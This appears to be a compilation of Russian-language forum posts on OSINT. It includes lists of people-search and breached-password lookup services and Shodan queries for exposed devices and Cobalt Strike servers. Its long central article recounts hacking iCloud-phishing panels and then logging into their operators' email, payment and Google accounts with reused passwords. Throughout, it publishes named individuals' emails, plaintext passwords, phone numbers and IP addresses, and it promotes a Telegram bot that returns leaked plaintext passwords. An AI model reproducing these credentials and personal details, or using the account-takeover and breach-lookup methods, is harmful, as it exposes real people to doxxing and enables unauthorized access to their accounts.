Вот мой небольшой набор инстрементов/сайтов/ресурсов, которые я практически ежедневно использую в своей деятельности:
Конечно же, первое дело - это поисковые движки:
- Google
- Yandex
Другие практически никогда мне не давали больше информации, чем перечисленные
два.
Spoiler: 1
Поиск по USERNAME/NICKNAME:
- https://namechk.com/
Поиск по EMAIL:
- https://haveibeenpwned.com/
- https://hacked-emails.com/
- https://ghostproject.fr/
- https://weleakinfo.com/
- https://pipl.com/
- https://leakedsource.ru/
- Приложение "Skype"
leakcheck.io
dehashed
snusbase
Поиск по номеру телефона:
- https://phonenumber.to
- https://pipl.com/
- Приложение "GetContact"
- Приложение "NumBuster"
- Приложение "Truecaller" или сайт https://www.truecaller.com/
- http://doska-org.ru/
- Приложение "Skype"
Общий поиск по соц. сетям, большой набор разных инструментов для поиска:
- http://osintframework.com/
Поиск местоположения базовой станции сотового оператора:
- http://unwiredlabs.com
- http://xinit.ru/bs/
Получение фотографий из соц. сетей из локального района (по геометкам):
- http://sanstv.ru/photomap
Поделитесь "своими" сервисами, которые Вам часто помогают пробивать информацию и докапываться до сути кейса)
About:
Payload.sh/db is a totally free hacked-database search-engine created for Security Analysts, Journalists, Security Companies, and everyday people to help secure accounts and provide insight on database breaches and account leaks. Protect yourself before it's too late, don't wait until you're hacked.
**Search through our 10,231,651,731 records to find out!
Info:** A friendly service/board is offering a fully free database search
engine service.
According to them as long as the service is not abused it will stay public and
free.
Respect it and do not search for dumb things what will cause 2 much server
load.
Your options are(AutoDetect):
Is my email pwned?
If your email has been pwned, it means that the security of your account has been compromised.
There's a lot of sensitive information linked to your email address. You might have linked your credit card information or some other important personal information with the same login credentials on another account.
Searcher Link:https://Payload.sh/db
Make sure to show your support to this service by leaving a comment on this thread and not letting it die out
Предлагаю в этой ветке публиковать интересные результаты выдачи поисковика
Shodan (и не только).
Формат выдачи может быть различным - скриншоты веб-стрницы, копия командной
строки клиента shodan, ссылка на сниппеты.
Для начала перечислю уже упоминавшиеся на ресурсе дорки:
shodan search DICOM port:104
shodan search 4G-N12
shodan search DIR-456U
shodan search poer:9100 pjl
shodan honeyscore
shodan search server:machete server
Из последнего, интересного, были проиндерсированы серверы Cobaltstrike
Teamservers, найти можно по запросу - shodan download cobaltstriketeamservers ssl:87f2085c32b6a2cc709b365f55873e207a9caa10bffecf2fd16d3cf9d94d390c
Hidden content for authorized users.
Внимание! Несмотря на то, что для работы над этой статьей я потратил не один
десяток часов, эта история еще не закончилась и именно ты, %username%, можешь
в ней поучаствовать. Если у тебя чешутся руки - попробуй осилить этот текст.
Обещаю, будет весело! Эта история пока не имеет конца, но у нее есть начало.
А начинается она с 2017 года, когда канал Информация
опасносте выложил следующего содержания пост:
Думаю мне, как и многим, было любопытно, что это за фейк такой. Что за движок,
как работает и насколько продвинуты фишеры (ну мало ли, может опять php скрипт
на бесплатном/дешевом vps, как в 1732 году)?
Оказалось, что правда: разбросанные php скрипты, админка, шаблоны фейков.
Изучив данный хост, уязвимости привели меня к получению админки, а потом и к
выполнению произвольного кода. Как следствие - я получил доступ к базе данных,
логам и конечно же к исходникам.
Как оказалось, это дало толчок к исследованию нескольких десятков таких же ресурсов и породило рассказ, который ты сейчас читаешь.
Что происходит? У жертвы воруют телефон. Если Android, то чаще всего его сразу можно продать, как самостоятельный: вытащил симку, рутанул, и уже на авито. Но есть свои нюансы: типа пароль на вход, заблокирован загрузчик — но это совсем другая история.
А вот с айфонами уже намного сложнее, так как пароль на включение — это обязательное условие. А еще владелец может заблокировать устройство, оставив контактный номер. Мол, потерял, просьба вернуть за вознаграждение. Взять и прошить его не выйдет, поэтому либо на запчасти (стоимость айфона тогда теряется в несколько раз), либо страдать.
Однако, с развитием технологий защиты всегда развивается мошенничество, поэтому выход у воров был таков — отправить фишинг на контактный номер жертвы. А что? Удобно. Жертва свои контакты оставляет сама, тебе остается лишь представиться компанией «Яблоко» и заставить ввести пользователя данные от icloud.
Несмотря на то, что популярность такого фишинга выросла в 2017 году, один из первых скриншотов подобного сервиса был сделан еще в 2015 году.
Сначала слали на красивые домены вида lcloud.com (не путать с icloud), но когда поняли, что их закрывают, стали поступать проще. На красивых доменах располагают сервисы-редиректоры, которые делают короткую ссылку. Такие закрыть труднее — они же ничего противозаконного не размещали. Просто сервис коротких ссылок с именем мимикрирующим под apple или icloud.
Пройдя по ней, ты увидишь адаптивную форму аутентификации, которая грузится даже быстрее чем icloud.com, а может быть и сразу саму карту дабы разогреть твой интерес, с дальнейшим запросом аутентификации.
Вот только не говори, что именно ты такой умный, и не повелся бы на подобное. Когда ты теряешь дорогую вещь, а потом есть шанс того, что она нашлась – ты в состоянии шока можешь сотворить глупость. Но тут и как с доменом повезет: может быть глаз зацепится за подозрительное место, а может быть будет неотличим от оригинала, например, как делал [этот чувак](http://www.infosecisland.com/blogview/24918-When-Is-Applecom-Not- Applecom-Faked-Punycode-Domains-Running-Rampant.html) с помощью Punycode.
«Двухфакторная аутентификация», — скажешь ты. Ну да, только фишеры давно научились показывать и форму ввода двухфакторки (подумаешь, еще один php скрипт).
Что делают после того как получают доступ к icloud? В лучшем случае — отвязывают телефон. В худшем — блокируют все остальные устройства Apple (ибо ты также можешь где-то оставить ноутбук, поэтому эта фича присутствует). Только в этой ситуации вы меняетесь сторонами, на твоем любимом ноуте с огрызком появится надпись мошенника и контакты для разблокировки. А там уже как договоритесь
Кстати, у одного из сотрудников Kaspersky Lab именно таким способом “отжали” телефон. Статья-история, как это происходит от лица жертвы. Но если вы все-таки не повелись на фишинг — вас продолжат социалить через звонок. Но об этом позже.
SaaS для воров
Итак, что же это за гадость такая.
На самом деле существует множество систем, один запилил на движке Laravel, другие - это группа AppleKit, MagicApp, Phantom, Phoenix и iPanel Pro и более примитивные поделки. Все они обколются своей марихуаной и форкают друг-друга, соревнуясь у кого лучше логотип. А самое забавное, что наследуя чужой код, они наследуют чужие уязвимости и бэкдоры.
На всякий случай, заботясь о том, что найденные баги могут прочитать в статье
и зафиксить, примеров я приводить не буду. Есть подозрения, что создатели как
минимум панели Phoenix точно понимают по-русски))
Но как бонус — выложу исходный код. Исходники у авторов и так есть! А баги (и
бэкдоры) ты и сам увидишь.
Как-то чуваки смекнули, что воры сами-то не шарят в IT, поэтому поднять фейк, разослать СМС — непосильная задача. А так как все дороги ведут к мастеру по телефонам (А кому еще продавать запчасти?), он может и своим клиентам помочь разблокировать мобилку или купив по-дешевке ворованный iPhone поднять его в цене, немного поработав над ним.
Зарабатывают на этом все. Аренда сервиса стоит $150-350 (в месяц), тебе дают инструкцию по установке, ты покупаешь домен, вбиваешь заказы, а остальное система сделает сама. Дальше по ~$100-150 ты продаешь эту “разблокировку”.
На западе большей популярностью пользуется iPanel, в странах СНГ — Phoenix.
Как это выглядит со стороны админа фишинга:
Админ может крутить настройки, например, отправку письма после успешной отвязки или оповещение в Telegram (куда же без него) и всякое такое по-мелочи.
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2Fwy%2Fqq%2F5g%2Fwyqq5goxiedutgmjv5hfa- zjmus.png&hash=dc26de3ff45ca4216fa5144a6a024ed5)
Добавляя заказ, нужно указать какой телефон и IMEI. Также, он может написать заметку, от кого поступил заказ.
Часто можно увидеть что-то вроде Жэка Вазап или Коля Лысый, что несколько забавляет. Как ты понимаешь, физическое наличие телефона вовсе не нужно, поэтому услуга продвигается в интернете, а работать с этим можно удаленно.
Язык SMS система поставит сама.
Также можно выбрать тип дизайна фишинга, например, из таких вариантов:
Все достаточно адаптивно и хорошо смотрится и на телефонах, и на десктопе. Иногда количество и тип страничек различается, но не значительно.
Вход в админку у всех разный. Но это обманчивое ощущение, так как в большинстве своем это форки Phoenix или iPanel Pro, а интерфейс внутри одинаковый, разве что меняются логотипы и, иногда, цвета.
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2Fwn%2Fu_%2Fhn%2Fwnu_hne-e1p-zpbk8uztli- m-mq.jpeg&hash=3d97d9ac5cb3befb829e3c70d02f5489)
Бэкдоры
А я говорил, что они оставляют бэкдоры?
iPanel вообще забавный! Зацени.
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2Fcu%2Fk4%2Fbv%2Fcuk4bv- a_889lq_69pnnfwqrs-s.jpeg&hash=55e3901678a47903736e0ab785b4620c)
У iPanel есть автоматическая установка. Так как система предназначена для установки на хостинги с контрольной панелью (типа cpanel), нужно указать логопас для нее. А при установке у тебя будет дефолтный пароль на СУБД - ipanel@789
Если отправить в качестве логина или пароля ссылку и слушать порт, то мы увидим, как к нам стучится:
Code:Copy to clipboard
23 Jan [14:35:48] from 149.154.161.4 HTTP: / [] (TelegramBot (like TwitterBot)) euConsent=true; BCPermissionLevel=PERSONAL; BC_GDPR=11111; fhCookieConsent=true; gdpr-source=GB; gdpr_consent=YES; beget=begetok
Это говорит о том, что логин и пароль улетел кому-то в телегам. Зато удобно!
Еще одним доказательством наличия бэкдоров могут послужить логи, которые оставляют за собой след из ошибок:
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2Fta%2Fs5%2Fne%2Ftas5neopfgfo628kc1hegvve- zw.jpeg&hash=36fa3e11e905c4e30bc43382cd176f56)
Давайте посмотрим, что там у нас. Функции ereg_replace и eval? Батенька, да у вас RCE!
А почему никто не видит? Код обфусцирован с помощью ioncube. А у панели есть проверка лицензии, не заплатил — сори чувак. Получается, хозяин панели раздает всем свой обфусцированный код, они стучат ему на сервер (ph-phoenix.com в случае феникса), а он может туда заламываться в любое время. Ну и наглость )
Но я не растерялся ☝ и частично раскукожил код (целых 10 баксов потратил).
Исходники были слиты, был сделан дамп базы данных. Но все это забылось на несколько лет.
Прошел год
Прошло два года
Второе пришествие началось, когда у моего друга — Киберпанка, произошла такая же история.
Все по классической схеме. Кража, блокировка, фишинг на домен (в этот раз был icloud.at), который редиректит на саму панель с доменом www.icloud.com.fmistatus.info. Позже тот хост погас и пришла СМС, которая ведет на apple-find.ru
Кибер созвал народ ломать фейк, подтянулись ребята из DC8800, которые в дальнейшем помогли распотрошить базу.
А так как уязвимости в этой панели мне уже были известны, фишинг был успешно
взломан в короткие сроки. Администратором его был некий
kolya2017zaza@gmail.com с паролем Zaza2015,
что, кагбе, намекает, я Коля Заза, и “мой пароль не менялся с 2015 года”.
Но в интернете нет ни единого упоминания этого аккаунта:
Your search - "kolya2017zaza" - did not match any documents.
Взгрустнулось.
Изучаем базу дальше. Вспоминаем про настройки, в дампе БД это таблица options.
Находим там отправку уведомлений с адреса ivan89776593244@yandex.ru
Отлично, значит отправляются данные с сервера яндекса:
Я испугался, что двухфакторка. Но нет.
Догадываешься, что нужно ввести, чтобы попасть внутрь?
После успешного входа видим, что у нас есть оповещения от нескольких сервисов. Ух ты, а Ванька-то москвич! Интересно, коренной?
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2Fos%2Fm-%2Fmj%2Fosm- mj-srjokw-jzxufqm2todmq.png&hash=889a18e85f7916d7207772127997d248)
Видим одно отправленное письмо:
По общению понятно, что москвич не коренной. Но не суть.
Проверяем Zadarma (это сервис аренды виртуальных номеров) — заблокирован. Проверяем Skype — заблокирован.
Зачем эти сервисы?
Если фишинг не сработал, они звонят под видом сотрудника сервисного центра (а
может и не под видом). Говорят, что какой-то подозрительный тип принес
мобилку, скоро ее нужно будет отдать, пытаются заговорить зубы (переключите
язык на английский) и все к тому, чтобы ты нажал на удаление телефона из
функции пропажи.
Идем в Яндекс Деньги:
Видим: IP адрес во всех операциях принадлежит Megafon, покупки сервисов Zadarma, четырех доменов, два пополнения телефонов:
Code:Copy to clipboard
+7 977 6593244
+7 916 1168710
Яндекс деньги пополнялись через аккаунт в Qiwi. Используем телефон “Ивана” и известный пароль. Он подходит и тут. Ведь как известно, стабильность — признак мастерства.
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2Fi-%2F3q%2Fny%2Fi-3qny8701poqjqojpogub- qfk8.png&hash=f1b5e7716f3cee7f308db8cf265757c1)
Выясняем, что кошелек Qiwi пополнялся как с помощью номера +7 977 8667146 (еще один одноразовый номер), так и с помощью терминала. На самом деле там номеров больше, мне просто лень искать их в логе (а я его сохранил).
А сейчас я покажу небольшой трюк по OSINT в Qiwi. Каждый терминал имеет свой уникальный идентификатор. Если перейти в детали платежа и посмотреть json, то вместе с разными идентификаторами будет параметр account - это именно он!
Но что с ним делать, не бегать же по всей Москве в поисках номера терминала? У
Qiwi есть приятная опция для таких случаев — карта
терминалов.
Ходим по карте, смотрим на прилетающие идентификаторы и понимаем, что терминал
стоит на рынке Царицыно.
А еще, зная номер терминала, дату и код операции, можно проверить платеж с помощью этих данных на страничке проверки чека.
“И что же случилось дальше?” - спросишь ты.
А я отвечу - ничего.
Куча левых телефонов, левые имена, и рынок в Царицыно.
Но чтобы не было скучно, я решил продолжать ломать фейки. А заодно и смотреть, все ли такие же аккуратные, как КоляВова, который пытался увести у друга аккаунт.
Я и бал фишеров. Волк
Несколько раз мне попадался email volkbaku@mail.ru
на доменах findfindiphone.com и findphonefmi.com
Я, воспользовавшись методом дедукции, предположил, что этот человек вряд ли
мексиканец или итальянец.
Пароли у него попадались Pass12340@ и Orxan1313@.
Логин гуглится на GSM форуме, больше интересного вроде нет.
А по почте можно посмотреть соцсеточку MailRu:
Clean icloud unlocking service, говорит он. А имени нет! Ну, храни свои
секретики.
Смотрим его email в других соцсетях, например из утечки БД у vk.
И вот оно что! ID в вконтактике - id105140112,
также находим facebook -
necefliorxan. Instagram
@orhkan13 указан на странице.
В пароле был логин из инстаграма, заметил?
Чувак из Арзейбайджана, живет в Москве. Master in programmer, говорит в facebook.
В общем, успешный успех.
Я и бал фишеров. Passwordman
В другом случае попался домен [icloud.com-maps-id.com](http://icloud.com-maps- id.com/), админский аккаунт - find48store@yandex.ru
Поиск по почте не дал ничего интересного.
А вот пароль… Пароль у админа панели - vasif548! Вглядись в пароль - совсем
другое дело.
Люди забывают, что фингерпринтом пользователя может быть не только какой-то
идентификатор типа логина или электронной почты. Им может быть и пароль!
У тебя может быть множество логинов, но если ты используешь один пароль — тебя
можно легко раскусить. А если ты используешь пароль из собственного логина —
ну извините. Мог бы хотя бы скопировать логин в качестве пароля два раза, как
это делаю я!
Этот чувак зарегался на большем количестве форумов.
Но вот незадача - больше данных я не вижу. Но ты заметил, что этот фишер и волк-из-Баку сидели на одном форуме? Пробуем логопас волка и…
Последняя активность в 2016, наверняка у него есть vk. На всякий случай изучил друзей Волка, но ничего.
Думаю, а не замутить ли социалочку? Напишу, мол, дай свой актуальный контакт. Вдруг вообще один посоветовал форум другому?
Составляем письмо:
Нет, что-то не так. Редактируем письмо следующим образом и засылаем:
Ждем.
Проходит неделя, а ответа все нет. И тут я понял, что допустил досадную ошибку. Я вновь стал изучать профили vasif548 и наткнулся на то, что на сайте 4pda у него был указан vk!
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2Fa2%2F6w%2Fe-%2Fa26we- hmok9_w2qagj_vlhcftoc.png&hash=886ec4ed4ec413582e2835a66b8f25fe)
Готовимся лицезреть, открываем ссылку https://vk.com/id277815372
Но все что попало в интернет - остается в интернете. Страница с таким id была некого Васифа Бахышова, о чем говорит сервис vkfaces (https://vkfaces.com/vk/user/id402895773)
Смотрим на указанную дату рождения, ищем в других соцсетях. Находим одного Васифа. В фотографиях видим объявления о разблокировках телефона.
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2Ftz%2Fjo%2Fza%2Ftzjoza3sdmoeua- vke2_omyeazs.jpeg&hash=98c791199cfd7bef29fea88c66832d35)
Бум! Савеловский рынок, Павильон 45
Еще через полгода
Шло время, количество фейков не уменьшалось, кого-то было трудно найти, кто-то
регистрировался на свою почту.
Нвызов ошибки или получение доступа к логам ошибки, так как часто
администратор панели указывал свой ник на хостинге, который ставился в путь к
веб-приложению.
Другие, после того, как устанавливали панель явно тестировали ее работоспособность на себе. Руки не дошли еще проверить все дампы баз и посмотреть. Но когда я к этому вернусь - выложу свои догадки.
Почему я выкладываю только данные администраторов? Потому что от баз жертв нет никакого смысла, им и так досталось, а тут еще их данные попадут в сеть.
Прошло где-то полгода после того, как был упущен злодей, с которым столкнулся мой друг.
Напомню, что “КоляВаня” был на домене
www.icloud.com.fmips.ru
И в этот момент мне попался на глаза следующий домен
www.icloud.com.fmistatus.info
У первого был IP адрес:
93.170.123.118
У нового IP адрес:
93.170.123.102
Используем дедукцию, и понимаем, что это скорее всего один хостинг. Ну, я сначала не посчитал это подозрительным, бывает, что чисто случайно несколько человек используют мелкого и никому неизвестного хостера, датацентр — имя которого MAROSNET. А еще точнее — непубличного, который игнорирует жалобы.
Email админа странный - soz112233soz@gmail.com
Но больше всего смутил пароль - Qaqa2015
.
Похож на предыдущий - Zaza2015
?
Вот и я так подумал.
Чекаем почту - подходит!
Отлично. Изучаем почтовик.
Два отправителя писем - ExpressVPN и TXTDAT.
Смотрим VPN:
Забавно, он потерял свой доступ к VPN. С кем не бывает?
Вспоминаем, что Google хранит историю поиска и
местоположения.
Перемещения отсутствуют, а вот поиск сохранился:
Хорошо, видим что он посещал:
На тот момент использовал VPN?
Смотрим ниже:
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2Fl-%2Fbo%2Fcz%2Fl- bocz81rc8hthsr3or2jzvg3qs.png&hash=b35b08133161d282052c70618ce7956a)
Ах ты маленький шалунишка! Забыл перелогиниться? Смотрим подробности, google говорит, что он из Москвы. Лексика похожа на предыдущего админа, которого мы упустили полгода назад. Пока все совпадает.
Смотрим в письмо TXTDAT, видим, что указанный логин: Lostoff.
Еще под этим именем можно найти сервис взлома почт, разблокировку айфонов, возможно из-за того, что это достаточно популярный логин.
Восстанавливаем пароль, проходим в TXTDAT.
Немного о нем: это сервис отправки СМС с подменой отправителя. Я попытался на нем зарегистрироваться, но нужно ждать подтверждение администратора. В интернете о нем особо никто не говорит. Видимо, это закрытый сервис “только для своих”.
Офигеваем, что всего один человек в пике может рассылать более сотни смс в день. Заходим в настройки аккаунта, видим номер.
Эх, очередной номер - однодневка. Или нет…
Добавляю в контакты в telegram:
Lostoff! Не соврал.
Доначу в telegram-бота @get_kontakt_bot и пробиваю номер там.
Зейнал Мамедов! Известный как “программист Зейнал”, “Зейнал баба” и “Зейнал Царицино К163”
Находим по этому номеру объявления:
Смотрим локацию:
Царицыно , что совпадает с первыми зацепками.
Вконтакте я нашел одного Зейнала Мамедова, который состоит в группе Царицыно и
Продать/купить айфон. Но нет никаких других связей, а номер телефона явно
привязан к другому лицу.
Так давайте же найдем его?
С чего начать?
Как искать фейки?
К сожалению и домены не живут долго, но всегда появляются новые.
Я использовал несколько подходов.
Первый , и самый банальный, это мониторинг соцсетей.
Вводим в соцсеточках разные вариации поисковых запросов вида “украли iphone смс”, получаем выдачу из пострадавших. Как с грустными историями, что у них помимо телефона вывели деньги из банка, так и с просто недовольствами.
Но нам важны ссылки, поэтому списываем их с скриншотов. Если не стесняетесь, можно написать жертвам и лично попросить ссылку.
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2F0u%2Fx-%2Fvj%2F0ux- vjqml0htthcy2jmshjezkhk.jpeg&hash=4b520cf778612d29fc4338390dfe4d3b)
Способ два. Если домен попал в поле зрения различных роботов, попытаться найти их.
На помощь приходят несколько сервисов:
Офигенный сайт, сам постоянно пользуюсь. Достаточно написать intitle:"iCloud
cannot find that page", чтобы ловить те фейки, у которых на главной странице
404 ошибка icloud.
Можно уточнить поиск по определенному сайту, например site:cutestat.com.
Они позволяют найти хосты, на которых крутились такие же сайты. Используем Title страницы, как и в предыдущем варианте.
Очень крутой сайт. Он позволяет искать, например, похожие
ссылки.
Это сразу дает множество свежих доменов на движке Phoenix.
Панель iPanel Pro редиректит с главной страницы на оригинальный icloud.com,
поэтому можно отследить
редиректы.
Третий способ - мониторинг в реальном времени.
Есть классный скрипт от x0rz -
phishing_catcher, он позволяет
наблюдать за выпущенными сертификатами. Но так как нам интересен только
icloud, смотрим на домены. Выбираем ключевые
слова и доменные зоны.
Я оставил только такие ключевые слова:
Code:Copy to clipboard
# Apple iCloud
'appleid': 70
'icloud': 60
'iforgot': 60
'itunes': 50
'apple': 40
'iphone': 30
'findmy': 30
'findme': 30
'location': 30
'applecare': 30
'fmf': 20
'fmi': 20
Запустив скрипт, ставим на мониторинг, а потом смотрим выдачу. Что это популярный рынок можно судить о том, что в день регистрируют около 10 доменов.
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2Fui%2Fix%2Fbe%2Fuiixbewbo5_zv5qr- bpzaxnfgra.png&hash=4cec0b9b7f5f0f6471d37c8f6d982efe)
Четвертый , и последний способ на сегодня, это поиск уже не по
сертификатам, а по зарегистрированным доменам. В этом нам поможет
dnspedia.
Я думаю, ты догадаешься как искать домены более чем за 7 дней.
Не конец
Подытожим.
Как говорил какой-то умный чувак, стоит человеку, который защищается, один раз ошибиться - его взломают. Но стоит взломщику ошибиться один раз - его найдут.
На этом мои полномочия - все. Я буду обновлять и дополнять материал, еще есть что можно рассказать.
Прикрепляю домены и администраторов. Исходники тут. Просьба комментировать с тегом HIDE, а я чуть позже соберу все самое интересное
В первом сообщении темы собраны курсы/вебинары/конференции по OSINT и
конкурентной разведке, с краткой информацией. Для удобства курсы
рассортированы по учебным центрам.
В спойлере "Другое" будут публиковаться различные одиночные курсы.
Если вы нашли интересный курс - пишите, и я добавлю его в общий список.
Если хотите оставить отзыв о курсе - пишите, я буду благодарен.
Spoiler: Учебный центр "Информзащита"
№ п/п| Название курса| Краткая информация| Ссылка
---|---|---|---
1| Управление конкурентной разведкой (ЭБ19)| Форма обучения: -
Продолжительность: 2 дня
Стоимость: 18 200 руб.
Вендор: УЦ "Информзащита"
Преподаватель: -|
Специализированный центр обучения по информационной, экономической и кадровой
безопасности. Очное и дистанционное обучение. Практические курсы. Опытные
преподаватели-практики.
itsecurity.ru
2| Управление конкурентной разведкой (ЭБ19-В)| Форма обучения: видеокурс
Продолжительность: 2 дня
Стоимость: 18 200 руб.
Вендор: УЦ "Информзащита"
Преподаватель: -|
Специализированный центр обучения по информационной, экономической и кадровой
безопасности. Очное и дистанционное обучение. Практические курсы. Опытные
преподаватели-практики.
itsecurity.ru
3| Управление конкурентной разведкой (для физ.лиц) (ЭБ19-Ф)| Форма обучения:
видеокурс
Продолжительность: 2 дня
Стоимость: 6 400 руб.
Вендор: УЦ "Информзащита"
Преподаватель: -|
Специализированный центр обучения по информационной, экономической и кадровой
безопасности. Очное и дистанционное обучение. Практические курсы. Опытные
преподаватели-практики.
itsecurity.ru
4| Система противодействия незаконным методам конкурентной разведки (ЭБ06)|
Форма обучения: -
Продолжительность: 3 дня
Стоимость: 27 800 руб.
Вендор: УЦ "Информзащита".
Преподаватель: -|
](https://itsecurity.ru/catalog/kurs-konkurentnaya-razvedka/)
Бизнес разведка- курсы и семинары по противодействию незаконным методам конкурентной разведки itsecurity.ru
Spoiler: Академия информационных систем
№ п/п| Название курса| Краткая информация| Ссылка
---|---|---|---
1| Поисковые системы и конкурентная разведка в Интернете| Форма обучения:
Очно/Дистанционно
Продолжительность: 2 дня
Стоимость: 23 500 руб.
Вендор: АИС
Преподаватель: Масалович Андрей Игоревич|
Информационных Систем ](https://infosystems.ru/courses/razvedka/poiskovye- sistemy-i-konkurentnaya-razvedka-v-internete/)
Академия Информационных Систем собраны учебные курсы, где не последняя роль
отведена Поисковые системы и конкурентная разведка в Интернете
infosystems.ru
2| Управление методами конкурентной разведки в Интернете| Форма обучения:
Очно/Дистанционно
Продолжительность: 7 дней
Стоимость: 62 500 руб.
Вендор: АИС
Преподаватель: Масалович Андрей Игоревич|
Информационных Систем ](https://infosystems.ru/courses/razvedka/upravlenie_metodami_konkurentnoy_razvedki_v_internete/)
Академия Информационных Систем собраны учебные курсы, где не последняя роль
отведена Управление методами конкурентной разведки в Интернете
infosystems.ru
3| Методы киберразведки. Новый арсенал OSINT в цифровом мире. Базовый курс|
Форма обучения: Очно/Дистанционно
Продолжительность: 2 дня
Стоимость: 25 000 руб.
Вендор: АИС
Преподаватель: Масалович Андрей Игоревич|
в Академия Информационных Систем ](https://infosystems.ru/courses/razvedka/metody_kiberrazvedki_novyy_arsenal_osint_v_tsifrovom_mire_bazovyy_kurs/)
Академия Информационных Систем собраны учебные курсы, где не последняя роль
отведена Методы киберразведки. Новый арсенал OSINT в цифровом мире. Базовый
курс
infosystems.ru
4| Комплексная программа "Методы киберразведки. Новый арсенал OSINT в
цифровом мире "| Форма обучения: Очно/Дистанционно
Продолжительность: 4 дня
Стоимость: 45 000 руб.
Вендор: АИС
Преподаватель: Масалович Андрей Игоревич|
цифровом мире " в Академия Информационных Систем ](https://infosystems.ru/courses/razvedka/kompleksnaya_programma_metody_kiberrazvedki_novyy_arsenal_osint_v_tsifrovom_mire_/)
Академия Информационных Систем собраны учебные курсы, где не последняя роль
отведена Комплексная программа "Методы киберразведки. Новый арсенал OSINT в
цифровом мире "
infosystems.ru
5| Конкурентная разведка для обеспечения экономической безопасности на
предприятии и защита от утечек конфиденциальной информации| Форма обучения:
Очно/Дистанционно
Продолжительность: 3 часа
Стоимость: БЕСПЛАТНО
Вендор: АИС
Преподаватель: Масалович Андрей Игоревич|
предприятии и защита от утечек конфиденциальной информации в Академия Информационных Систем ](https://infosystems.ru/courses/razvedka/konkurentnaya_razvedka_dlya_obespecheniya_ekonomicheskoy_bezopasnosti_na_predpriyatii_i_zashchita_ot/)
Академия Информационных Систем собраны учебные курсы, где не последняя роль отведена Конкурентная разведка для обеспечения экономической безопасности на предприятии и защита от утечек конфиденциальной информации infosystems.ru
Spoiler: Другое
№ п/п| Название курса| Краткая информация| Ссылка
---|---|---|---
1| Магистерская программа «Аналитик деловой разведки» (RUS/ENG)| Форма
обучения: Очная
Продолжительность: 2 года
Стоимость: 390 000 руб. в год
Вендор: ВШЭ (Институт проблем безопасности)
Преподаватель: -|
](https://www.hse.ru/ma/intelligence/admission/)
Программа подготовит специалистов в области информационно-аналитического
обеспечения комплексной безопасности бизнеса. Акцент сделан на изучении
функции деловой разведки как неотъемлемой составной части менеджмента
организации
www.hse.ru
2| Конкурентная разведка. Оценка надежности контрагентов и безопасности
коммерческих предложений| Форма обучения: Очно/Онлайн/Видеокурс
Продолжительность: 2 дня
Стоимость: 23 500 руб. (очно), 8 175 руб. (Онлайн, видеокурс)
Вендор: Русская школа управления
Преподаватель: Барбашев С.А.|
разведке, оценка надежности контрагентов и безопасности коммерческих предложений ](https://uprav.ru/bezopasnost/konkurentnaya-razvedka/)
На курсе обучения для специалистов по безопасности, Вы узнаете как найти
нужных специалистов для создания службы конкурентной разведки и определять
надёжность компаний с помощью растровых признаков опасности.
uprav.ru
3| Конкурентная разведка: маркетинг рисков и возможностей| Форма обучения:
Онлайн
Продолжительность: 10 занятий по 4 часа
Стоимость: 50 000 руб.
Вендор: -
Преподаватель: Ющук Евгений Леонидович|
](http://www.9sb.ru/)
Авторский курс Евгения Леонидовича Ющука
www.9sb.ru
4| Конкурентная разведка. Анализ надежности контрагентов и безопасности
коммерческих предложений| Форма обучения: Онлайн
Продолжительность: -
Стоимость: 21 900 руб.
Вендор: Moscow Business School
Преподаватель: Панкратов В.В., Баяндин Н.И.|
mbschool.ru
Чем заменить платные курсы?
Spoiler: Тык
1. Книги:
- "Конкурентная разведка" в 2-х частях, Ющук Е.Л., Мальцев А.А. Скачать:
[тык1](http://www.ci-razvedka.ru/Docs/Uchebnik-Konkurentnaya-Razvedka-UrGEU-
Part1.pdf), [тык2](http://ci-razvedka.ru/Docs/Uchebnik-Konkurentnaya-Razvedka-
Part-2.pdf).
- "Конкурентная разведка: маркетинг рисков и возможностей", 3-е издание, 2019
г. В эл.варианте не найдена. Книгу продают только ИП и ЮЛ, ссылка на страницу
покупки: [тык](http://www.razvedka-internet.ru/kupit-knigu-konkurentnaya-
razvedka-marketing-riskov-i-vozmozhnostej-trete-izdanie-dopolnennoe-i-
pererabotannoe-evgenij-yushhuk-pri-uchastii-avtorov-n-a-pelevina-k-v-sergeev-
v-yu-yushhuk.html).
2. Бесплатные вебинары, конференции, Youtube, Twitter, форумы, торренты.
Искать по ключевым словам: OSINT, Competitive Intelligence, конкурентная
разведка.
3. Личный совет. Возьмите https://osintframework.com/, переведите на русский и адаптируйте под рунет: вместо Facebook - Вконтакте, вместо Yahoo - Mail.ru, и т.д. и т.п. Потренируетесь и наберете свою базу источников.
4. Еще личный совет. Тренируйтесь. Начните с легкого - найдите всю информацию в Интернете про себя. Потом на очень близкого человека. Потом на знакомого. Потом на совершенно чужого. Такой треннинг помогает довести действия до автоматизма, плюс поймете, что можно и нужно автоматизировать.
P.S. Я придерживаюсь такого мнения, что если за обучение платит работодатель - можно и нужно идти учиться. Даже если в описании курса мало полезного для вас. Личное общение с преподавателем или коллегами никто не отменял. Лично мне пришлось осваивать OSINT в ускоренном режиме, без курсов. И после 6 месяцев самостоятельного изучения темы пришлось скучать на платном курсе, ничего нового там не сказали.
OSINT на платформе Telegram
Предлагаю тут собирать полезные telegram боты, используемые для OSINT. удобные
в процессе сбора информации
@egrul_bot
Данный бот пробивает Конторы/ИП. По вводу ФИО/Фирмы предоставляет ИНН объекта;
учредителей бизнеса/партнеров и отчет налоговую декларацию. И наоборот: поиск
по ИНН выдаст ФИО/конторы. БД сами понимаете откуда.
Ограничений бота – нет.
@mailsearchbot
По запросу пробива e-mail бот выдает открытый «password» от ящика. Очень
огромная/крутая БД (висит давно, 1,5млрд учёток, год актуальности ~<2014г.).
Удобно составлять/вычислять персональные чарсеты с помощью, например, JTR.
Функционал бесплатный.
@getfb_bot
